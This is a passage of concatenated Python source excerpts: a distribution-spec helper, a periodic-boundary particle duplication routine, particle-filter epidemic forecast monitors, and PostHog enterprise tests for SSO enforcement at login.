self.input_params_spec = input_params_spec
def build_distribution(self, input_params):
"""Build a Distribution using ``input_params``.
Args:
            input_params (nested Tensor): the parameters for building the
                distribution. They should match the ``input_params_spec``
                provided to ``__init__``.
Returns:
Distribution:
"""
nest.assert_same_structure(input_params, self.input_params_spec)
return self.builder(**input_params)
@classmethod
def from_distribution(cls, dist, from_dim=0):
"""Create a ``DistributionSpec`` from a ``Distribution``.
Args:
dist (Distribution): the ``Distribution`` from which the spec is
extracted.
            from_dim (int): only use the dimensions from this one onwards. The
                reason for using ``from_dim > 0`` is that ``[0, from_dim)`` might
                be batch dimensions in some scenarios.
Returns:
DistributionSpec:
"""
builder, input_params = _get_builder(dist)
input_param_spec = extract_spec(input_params, from_dim)
return cls(builder, input_param_spec)
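# Illustrative sketch (not from the original module): a spec extracted from a
# batched distribution (``from_dim=1`` strips the batch dimension) can later
# rebuild a distribution from freshly computed parameters of the same shape:
#
#     dist = DiagMultivariateNormal(torch.zeros(32, 3), torch.ones(32, 3))
#     spec = DistributionSpec.from_distribution(dist, from_dim=1)
#     new_dist = spec.build_distribution(
#         {'loc': torch.zeros(32, 3), 'scale': torch.ones(32, 3)})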
def extract_spec(nests, from_dim=1):
"""
Extract ``TensorSpec`` or ``DistributionSpec`` for each element of a nested
structure. It assumes that the first dimension of each element is the batch
size.
Args:
nests (nested structure): each leaf node of the nested structure is a
Tensor or Distribution of the same batch size.
        from_dim (int): ignore dimensions before this one when constructing the spec.
    Returns:
        nest: each leaf node of the returned nested spec is the corresponding
            spec (excluding the batch size) of the element of ``nests``.
"""
def _extract_spec(obj):
if isinstance(obj, torch.Tensor):
return TensorSpec.from_tensor(obj, from_dim)
elif isinstance(obj, td.Distribution):
return DistributionSpec.from_distribution(obj, from_dim)
else:
raise ValueError("Unsupported value type: %s" % type(obj))
return nest.map_structure(_extract_spec, nests)
def to_distribution_param_spec(nests):
"""Convert the ``DistributionSpecs`` in nests to their parameter specs.
Args:
        nests (nested DistributionSpec or TensorSpec): Each ``DistributionSpec``
            will be converted to a dictionary of the specs of its input ``Tensor``
            parameters.
Returns:
nested TensorSpec: Each leaf is a ``TensorSpec`` or a ``dict``
corresponding to one distribution, with keys as parameter name and
values as ``TensorSpecs`` for the parameters.
"""
def _to_param_spec(spec):
if isinstance(spec, DistributionSpec):
return spec.input_params_spec
elif isinstance(spec, TensorSpec):
return spec
else:
raise ValueError("Only TensorSpec or DistributionSpec is allowed "
"in nest, got %s. nest is %s" % (spec, nests))
return nest.map_structure(_to_param_spec, nests)
def params_to_distributions(nests, nest_spec):
"""Convert distribution parameters to ``Distribution``, keep tensors unchanged.
Args:
nests (nested Tensor): a nested ``Tensor`` and dictionary of tensor
parameters of ``Distribution``. Typically, ``nest`` is obtained using
``distributions_to_params()``.
nest_spec (nested DistributionSpec and TensorSpec): The distribution
params will be converted to ``Distribution`` according to the
corresponding ``DistributionSpec`` in | |
self.y)
self.y = sim_box.bottom - diff
if self.z > sim_box.back:
diff = self.z - sim_box.back
self.z = sim_box.front + diff
elif self.z < sim_box.front:
diff = abs(sim_box.front - self.z)
self.z = sim_box.back - diff
self.set_cub() # update the bounding box due to its movement
        # Now it's inside: check which faces the particle collides with
        left = self.bbox_xmin < sim_box.left
        top = self.bbox_ymin < sim_box.top
        front = self.bbox_zmin < sim_box.front
        right = self.bbox_xmax > sim_box.right
        bottom = self.bbox_ymax > sim_box.bottom
        back = self.bbox_zmax > sim_box.back
sim_width = abs(sim_box.right - sim_box.left)
sim_height = abs(sim_box.bottom - sim_box.top)
sim_depth = abs(sim_box.back - sim_box.front)
# If it collides with any three faces: Create 7 duplicates
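        # Under periodic boundary conditions a particle protruding through k
        # faces has 2**k - 1 periodic images: a corner overlap (three faces)
        # therefore needs 7 duplicates, and an edge overlap (two faces, handled
        # further below) needs 3.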
if sum([left, top, right, bottom, front, back]) == 3:
if left and top and front:
p1 = Ellipsoid(str(self.id)+'_RTF', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_RBF', self.x+sim_width, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_LBF', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_LTB', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_RTB', self.x+sim_width, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_RBB', self.x+sim_width, self.y +
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_LBB', self.x, self.y +
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif right and top and front:
p1 = Ellipsoid(str(self.id)+'_RBF', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LBF', self.x-sim_width, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_LTF', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_RTB', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_RBB', self.x, self.y +
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_LBB', self.x-sim_width, self.y +
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_LTB', self.x-sim_width, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif right and bottom and front:
p1 = Ellipsoid(str(self.id)+'_LBF', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LTF', self.x-sim_width, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RTF', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_RBB', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_LBB', self.x-sim_width, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_LTB', self.x-sim_width, self.y -
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_RTB', self.x, self.y -
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif left and bottom and front:
p1 = Ellipsoid(str(self.id)+'_LTF', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_RTF', self.x+sim_width, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RBF', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_LBB', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_LTB', self.x, self.y -
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_RTB', self.x+sim_width, self.y -
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_RBB', self.x+sim_width, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif left and top and back:
p1 = Ellipsoid(str(self.id)+'_RTB', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_RBB', self.x+sim_width, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_LBB', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_LTF', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_RTF', self.x+sim_width, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_RBF', self.x+sim_width, self.y +
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_LBF', self.x, self.y +
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
elif right and top and back:
p1 = Ellipsoid(str(self.id)+'_RBB', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LBB', self.x-sim_width, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_LTB', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_RTF', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_RBF', self.x, self.y +
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_LBF', self.x-sim_width, self.y +
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_LTF', self.x-sim_width, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
elif right and bottom and back:
p1 = Ellipsoid(str(self.id)+'_LBB', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LTB', self.x-sim_width, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RTB', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_RBF', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_LBF', self.x-sim_width, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_LTF', self.x-sim_width, self.y -
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_RTF', self.x, self.y -
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
elif left and bottom and back:
p1 = Ellipsoid(str(self.id)+'_LTB', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_RTB', self.x+sim_width, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RBB', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p4 = Ellipsoid(str(self.id)+'_LBF', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p5 = Ellipsoid(str(self.id)+'_LTF', self.x, self.y -
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p6 = Ellipsoid(str(self.id)+'_RTF', self.x+sim_width, self.y -
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p7 = Ellipsoid(str(self.id)+'_RBF', self.x+sim_width, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
duplicates.extend([p1, p2, p3, p4, p5, p6, p7])
return duplicates
# If it collides with any two faces: Create 3 duplicates
elif sum([left, top, right, bottom, front, back]) == 2:
if left and top:
p1 = Ellipsoid(str(self.id)+'_RT', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LB', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RB', self.x+sim_width, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
elif right and top:
p1 = Ellipsoid(str(self.id)+'_LT', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LB', self.x-sim_width, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RB', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
elif left and bottom:
p1 = Ellipsoid(str(self.id)+'_RB', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_LT', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_RT', self.x+sim_width, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
elif right and bottom:
p1 = Ellipsoid(str(self.id)+'_LB', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_RT', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_LT', self.x-sim_width, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
elif front and top:
p1 = Ellipsoid(str(self.id)+'_FB', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_BT', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_BB', self.x, self.y +
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif front and bottom:
p1 = Ellipsoid(str(self.id)+'_FT', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_BT', self.x, self.y -
sim_height, self.z+sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_BB', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif back and top:
p1 = Ellipsoid(str(self.id)+'_BB', self.x, self.y +
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_FT', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_FB', self.x, self.y +
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
elif back and bottom:
p1 = Ellipsoid(str(self.id)+'_BT', self.x, self.y -
sim_height, self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_FT', self.x, self.y -
sim_height, self.z-sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_FB', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
elif front and right:
p1 = Ellipsoid(str(self.id)+'_FL', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_BR', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_BL', self.x-sim_width, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif front and left:
p1 = Ellipsoid(str(self.id)+'_FR', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_BL', self.x, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_BR', self.x+sim_width, self.y,
self.z+sim_depth, self.a, self.b, self.c, self.quat)
elif back and right:
p1 = Ellipsoid(str(self.id)+'_BL', self.x-sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_FR', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_FL', self.x-sim_width, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
elif back and left:
p1 = Ellipsoid(str(self.id)+'_BR', self.x+sim_width, self.y,
self.z, self.a, self.b, self.c, self.quat)
p2 = Ellipsoid(str(self.id)+'_FL', self.x, self.y,
self.z-sim_depth, self.a, self.b, self.c, self.quat)
p3 = Ellipsoid(str(self.id)+'_FR', self.x+sim_width, | |
# Repository: ruarai/epifx.covid
from functools import reduce
import h5py
import logging
import numpy as np
import pypfilt.check as check
import pypfilt.context
import pypfilt.obs
import pypfilt.resample
import pypfilt.state
import pypfilt.stats as stats
import pypfilt.summary
from pypfilt.summary import Table, Monitor, obs_types
class PrOutbreak(Table):
"""
Record the daily outbreak probability, defined as the sum of the weights
of all particles in which an outbreak has been seeded.
:param name: the name of the table in the output file.
"""
def dtype(self, ctx, obs_list, name):
self.__model = ctx.component['model']
self.__time = ctx.component['time']
return [ctx.component['time'].dtype('date'), ('pr', np.float64)]
def n_rows(self, start_date, end_date, n_days, n_sys, forecasting):
return n_days
def add_rows(self, hist, weights, fs_date, dates, obs_types, insert_fn):
for date, ix, hist_ix in dates:
mask = self.__model.is_seeded(hist[hist_ix])
seeded_weights = weights[ix, :] * mask
date_enc = self.__time.to_dtype(date)
insert_fn((date_enc, np.sum(seeded_weights)))
class PeakMonitor(Monitor):
"""Record epidemic peak forecasts, for use with other statistics."""
peak_size = None
"""
A dictionary that maps observation systems to the size of each particle's
peak with respect to that system: ``peak_size[(unit, period)]``.
Note that this is **only** valid for tables to inspect in the
``finished()`` method, and **not** in the ``add_rows()`` method.
"""
peak_date = None
"""
A dictionary that maps observation systems to the date of each particle's
peak with respect to that system: ``peak_date[(unit, period)]``.
Note that this is **only** valid for tables to inspect in the
``finished()`` method, and **not** in the ``add_rows()`` method.
"""
peak_time = None
"""
A dictionary that maps observation systems to the time of each particle's
peak with respect to that system, measured in (fractional) days from the
start of the forecasting period: ``peak_time[(unit, period)]``.
Note that this is **only** valid for tables to inspect in the
``finished()`` method, and **not** in the ``add_rows()`` method.
"""
peak_weight = None
"""
A dictionary that maps observation systems to the weight of each
particle at the time that its peak occurs:
``peak_weight[(unit, period)]``.
Note that this is **only** valid for tables to inspect in the
``finished()`` method, and **not** in the ``add_rows()`` method.
"""
expected_obs = None
"""
The expected observation for each particle for the duration of the
**current simulation window**.
Note that this is **only** valid for tables to inspect in each call to
``add_rows()``, and **not** in a call to ``finished()``.
"""
simulated_obs = None
"""
Simulated observations for each particle for the duration of the
**current simulation window**.
Note that this is **only** valid for tables to inspect in each call to
``add_rows()``, and **not** in a call to ``finished()``.
"""
def __init__(self, exp_obs_monitor):
"""
:param exp_obs_monitor: the name of a
:class:`pypfilt.summary.ExpectedObsMonitor`.
"""
self.__run = None
self.__loaded_from_cache = False
self.__monitor_name = exp_obs_monitor
def prepare(self, ctx, obs_list, name):
self.__monitor = ctx.component['summary_monitor'][self.__monitor_name]
self.__ctx = ctx
self.__params = ctx.params
self.__obs_types = obs_types(ctx, obs_list)
self.__rnd = np.random.default_rng(ctx.params.get('prng_seed'))
def begin_sim(self, start_date, end_date, n_days, n_sys, forecasting):
logger = logging.getLogger(__name__)
time_scale = self.__ctx.component['time']
if self.__run is None or self.__run != (start_date, end_date):
# For each particle, record the weight and peak time.
num_px = self.__params['size']
self.__run = (start_date, end_date)
if self.__loaded_from_cache:
logger.debug("Using cached monitor state")
self.__loaded_from_cache = False
# Adjust the cached peak_time data now that the simulation
# start date is known.
dt = (time_scale.to_scalar(start_date)
- time_scale.to_scalar(self.__loaded_from_date))
logger.debug("Adjusting peak_time by {} days".format(dt))
for k, v in self.peak_time.items():
self.peak_time[k] = v - dt
return
logger.debug("Initialising monitor state")
self.peak_size = {k: np.zeros(num_px) for k in self.__obs_types}
self.peak_time = {k: np.zeros(num_px) for k in self.__obs_types}
self.peak_date = {k: np.empty(num_px, dtype='O')
for k in self.__obs_types}
self.peak_weight = {k: np.zeros(num_px) for k in self.__obs_types}
elif self.__run is not None and self.__run == (start_date, end_date):
logger.debug("Ignoring monitor state")
else:
logger.debug("Deleting monitor state")
self.__run = None
self.peak_size = None
self.peak_time = None
self.peak_date = None
self.peak_weight = None
def end_sim(self, hist, weights, fs_date, dates, obs_types):
self.expected_obs = None
def days_to(self, date):
"""
Convert a date to the (fractional) number of days from the start of
the forecasting period.
"""
time_scale = self.__ctx.component['time']
return time_scale.to_scalar(date)
def monitor(self, hist, weights, fs_date, dates, obs_types):
"""Record the peak for each particle during a forecasting run."""
self.expected_obs = self.__monitor.expected_obs
self.simulated_obs = {}
# Do nothing more if there are no dates to summarise.
num_dates = len(dates)
if num_dates == 0:
# Ensure an empty data structure exists, at least.
for (u, p) in obs_types:
self.simulated_obs[u, p] = np.array([])
return
periods = set([p for (_, p) in obs_types])
times = [date for (date, ix, hist_ix) in dates]
exp_shape = (len(times), self.__params['size'])
for (u, p) in obs_types:
self.simulated_obs[u, p] = np.zeros(exp_shape)
# Resampling can change the particle order, so we need to iterate over
        # the particles chronologically, and reorder the arrays whenever
# resampling occurs.
date_ix = 0
for date, ix, hist_ix in dates:
curr = hist[hist_ix]
prev_ixs = curr[:, -1].astype(int)
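            # When no resampling happened at this step, particle i descends from
            # particle i, so the parent indices stored in the last state column
            # are 0..N-1 and all successive differences equal 1; any other
            # pattern means the particles were reordered by resampling.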
resampled = not np.all(np.diff(prev_ixs) == 1)
if resampled:
# Particles were resampled on this date.
# Adjust the arrays to reflect the new particle ordering.
for k in self.__obs_types:
self.peak_weight[k] = self.peak_weight[k][prev_ixs]
self.peak_size[k] = self.peak_size[k][prev_ixs]
self.peak_date[k] = self.peak_date[k][prev_ixs]
self.peak_time[k] = self.peak_time[k][prev_ixs]
# Record the expected observations.
for p in periods:
n_back = self.__params['steps_per_unit'] * p
valid_types = [(u, pd) for (u, pd) in obs_types if p == pd]
for (u, p) in valid_types:
values = self.expected_obs[u, p][date_ix]
# Update the recorded peaks where appropriate.
mask = values > self.peak_size[u, p]
self.peak_size[u, p][mask] = values[mask]
self.peak_date[u, p][mask] = date
self.peak_time[u, p][mask] = self.days_to(date)
# Record the simulated observations
sim_values = pypfilt.obs.simulate(self.__ctx, date, u, p,
values, self.__rnd)
self.simulated_obs[u, p][date_ix] = sim_values
date_ix += 1
# Record the *final* weights.
for k in self.__obs_types:
self.peak_weight[k] = weights[-1]
def __obs_type_seq(self):
"""Return a generator that returns ``(obs_type, str_name)`` tuples."""
for u, p in self.__obs_types:
yield ((u, p), "{}/{}".format(u, p))
    def load_state(self, grp):
        """Load the monitor state from disk."""
logger = logging.getLogger(__name__)
logger.debug("{}.load_state('{}')".format(self.__class__.__name__,
grp.name))
# Record the start date used in the cached simulation, as this defines
# the origin for the peak_time values.
time_scale = self.__ctx.component['time']
start_date_enc = grp['start_date'][()]
self.__loaded_from_date = time_scale.from_dtype(start_date_enc[0])
# Initialise the data structures.
self.peak_weight = {}
self.peak_size = {}
self.peak_time = {}
self.peak_date = {}
# Load the cached state for each observation type.
for (k, name) in self.__obs_type_seq():
logger.debug("Loading sub-group '{}'".format(name))
sub_grp = grp[name]
self.peak_weight[k] = sub_grp['peak_weight'][()]
self.peak_size[k] = sub_grp['peak_size'][()]
self.peak_time[k] = sub_grp['peak_time'][()]
peak_date = sub_grp['peak_date'][()]
self.peak_date[k] = np.array([time_scale.from_dtype(d)
for d in peak_date])
# Indicate that the monitor state has been loaded from a cache file,
# and that the peak_time data needs to be adjusted once the simulation
# start date is known.
self.__loaded_from_cache = True
def save_state(self, grp):
"""Save the monitor state to disk."""
logger = logging.getLogger(__name__)
logger.debug("{}.save_state('{}')".format(self.__class__.__name__,
grp.name))
# Save the start date, as this is the origin for the peak_time values.
time_scale = self.__ctx.component['time']
start_date_enc = np.array([time_scale.to_dtype(self.__run[0])])
if 'start_date' in grp:
# Delete existing data sets, in case they differ in size or type.
del grp['start_date']
grp.create_dataset('start_date', data=start_date_enc)
data_sets = ['peak_weight', 'peak_size', 'peak_time', 'peak_date']
for (k, name) in self.__obs_type_seq():
logger.debug("Saving sub-group '{}'".format(name))
sub_grp = grp.require_group(name)
# Delete existing data sets, in case they differ in size or type.
for ds in data_sets:
if ds in sub_grp:
del sub_grp[ds]
peak_date = np.array([time_scale.to_dtype(d)
for d in self.peak_date[k]])
sub_grp.create_dataset('peak_weight', data=self.peak_weight[k])
sub_grp.create_dataset('peak_size', data=self.peak_size[k])
sub_grp.create_dataset('peak_time', data=self.peak_time[k])
sub_grp.create_dataset('peak_date', data=peak_date)
class ThresholdMonitor(Monitor):
"""Record when expected observations exceed a specific threshold."""
exceed_date = None
"""
A dictionary that maps observation systems to the date when each particle
exceeded the specific threshold: ``exceed_date[(unit, period)]``.
Note that this is **only** valid for tables to inspect in the
``finished()`` method, and **not** in the ``add_rows()`` method.
"""
exceed_weight = None
"""
A dictionary that maps observation systems to the **final** weight of each
particle: ``exceed_weight``.
Note that this is **only** valid for tables to inspect in the
``finished()`` method, and **not** in the ``add_rows()`` method.
"""
exceed_mask = None
"""
A dictionary that maps observation systems to Boolean arrays that indicate
which particles have exceeded the threshold:
``exceed_mask[(unit, period)]``.
Note that this is **only** valid for tables to inspect in the
| |
import datetime
import os
import uuid
from typing import cast
from unittest.mock import patch
import pytest
from django.core import mail
from django.core.exceptions import ValidationError
from django.test import override_settings
from django.utils import timezone
from freezegun.api import freeze_time
from rest_framework import status
from social_core.exceptions import AuthFailed, AuthMissingParameter
from ee.api.test.base import APILicensedTest
from ee.models.license import License
from posthog.constants import AvailableFeature
from posthog.models import OrganizationMembership, User
from posthog.models.organization_domain import OrganizationDomain
SAML_MOCK_SETTINGS = {
"SOCIAL_AUTH_SAML_SECURITY_CONFIG": {
"wantAttributeStatement": False, # already present in settings
"allowSingleLabelDomains": True, # to allow `http://testserver` in tests
},
}
GOOGLE_MOCK_SETTINGS = {
"SOCIAL_AUTH_GOOGLE_OAUTH2_KEY": "google_key",
"SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET": "google_secret",
}
GITHUB_MOCK_SETTINGS = {
"SOCIAL_AUTH_GITHUB_KEY": "github_key",
"SOCIAL_AUTH_GITHUB_SECRET": "github_secret",
}
CURRENT_FOLDER = os.path.dirname(__file__)
class TestEELoginPrecheckAPI(APILicensedTest):
CONFIG_AUTO_LOGIN = False
def test_login_precheck_with_enforced_sso(self):
OrganizationDomain.objects.create(
domain="witw.app",
organization=self.organization,
verified_at=timezone.now(),
sso_enforcement="google-oauth2",
)
User.objects.create_and_join(self.organization, "<EMAIL>", self.CONFIG_PASSWORD)
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.post("/api/login/precheck", {"email": "<EMAIL>"})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"sso_enforcement": "google-oauth2", "saml_available": False})
def test_login_precheck_with_unverified_domain(self):
OrganizationDomain.objects.create(
domain="witw.app",
organization=self.organization,
verified_at=None, # note domain is not verified
sso_enforcement="google-oauth2",
)
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.post(
"/api/login/precheck", {"email": "<EMAIL>"}
) # Note we didn't create a user that matches, only domain is matched
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"sso_enforcement": None, "saml_available": False})
def test_login_precheck_with_inexistent_account(self):
OrganizationDomain.objects.create(
domain="anotherdomain.com",
organization=self.organization,
verified_at=timezone.now(),
sso_enforcement="github",
)
User.objects.create_and_join(self.organization, "<EMAIL>", self.CONFIG_PASSWORD)
with self.settings(**GITHUB_MOCK_SETTINGS):
response = self.client.post("/api/login/precheck", {"email": "<EMAIL>"})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"sso_enforcement": "github", "saml_available": False})
def test_login_precheck_with_enforced_sso_but_improperly_configured_sso(self):
OrganizationDomain.objects.create(
domain="witw.app",
organization=self.organization,
verified_at=timezone.now(),
sso_enforcement="google-oauth2",
)
User.objects.create_and_join(self.organization, "<EMAIL>", self.CONFIG_PASSWORD)
response = self.client.post(
"/api/login/precheck", {"email": "<EMAIL>"}
) # Note Google OAuth is not configured
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"sso_enforcement": None, "saml_available": False})
class TestEEAuthenticationAPI(APILicensedTest):
CONFIG_EMAIL = "<EMAIL>"
def create_enforced_domain(self, **kwargs) -> OrganizationDomain:
return OrganizationDomain.objects.create(
**{
"domain": "posthog.com",
"organization": self.organization,
"verified_at": timezone.now(),
"sso_enforcement": "google-oauth2",
**kwargs,
}
)
def test_can_enforce_sso(self):
self.client.logout()
# Can log in with password with SSO configured but not enforced
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.post("/api/login", {"email": self.CONFIG_EMAIL, "password": <PASSWORD>})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.json(), {"success": True})
# Forcing SSO disables regular API password login
self.create_enforced_domain()
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.post("/api/login", {"email": self.CONFIG_EMAIL, "password": self.CONFIG_PASSWORD})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.json(),
{
"type": "validation_error",
"code": "sso_enforced",
"detail": "You can only login with SSO for this account (google-oauth2).",
"attr": None,
},
)
    def test_can_enforce_sso_on_cloud_environment(self):
self.client.logout()
License.objects.filter(pk=-1).delete() # No instance licenses
self.create_enforced_domain()
self.organization.available_features = ["sso_enforcement"]
self.organization.save()
with self.settings(**GOOGLE_MOCK_SETTINGS):
response = self.client.post("/api/login", {"email": self.CONFIG_EMAIL, "password": self.CONFIG_PASSWORD})
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
response.json(),
{
"type": "validation_error",
"code": "sso_enforced",
"detail": "You can only login with SSO for this account (google-oauth2).",
"attr": None,
},
)
def test_cannot_reset_password_with_enforced_sso(self):
self.create_enforced_domain()
with self.settings(
**GOOGLE_MOCK_SETTINGS, EMAIL_HOST="localhost", SITE_URL="https://my.posthog.net",
):
response = self.client.post("/api/reset/", {"email": "<EMAIL>"})
